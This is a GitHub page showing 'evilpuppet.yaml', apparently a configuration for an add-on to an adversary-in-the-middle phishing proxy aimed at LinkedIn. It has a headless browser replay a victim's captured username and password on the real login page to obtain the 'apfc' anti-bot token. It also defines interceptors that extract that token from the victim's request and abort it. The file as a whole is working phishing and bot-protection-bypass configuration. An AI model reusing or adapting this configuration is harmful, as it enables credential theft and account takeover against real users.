-
Notifications
You must be signed in to change notification settings - Fork 149
Expand file tree
/
Copy pathevilpuppet.yaml
More file actions
29 lines (27 loc) · 743 Bytes
/
Copy pathevilpuppet.yaml
File metadata and controls
29 lines (27 loc) · 743 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# evilpuppet add-on for target site
# domain = ['www.linkedin.com']
evilpuppet:
triggers:
- domains: ['www.linkedin.com']
paths: ['/checkpoint/lg/login-submit']
token: 'apfc'
open_url: 'https://www.linkedin.com/login'
actions:
- selector: '#username'
value: '{username}'
enter: false
click: false
post_wait: 500
- selector: '#password'
value: '{password}'
enter: false
click: false
post_wait: 500
- selector: 'button[type=submit]'
click: true
post_wait: 1000
interceptors:
- token: 'apfc'
url_re: '/checkpoint/lg/login-submit'
post_re: 'apfc=([^&]*)'
abort: true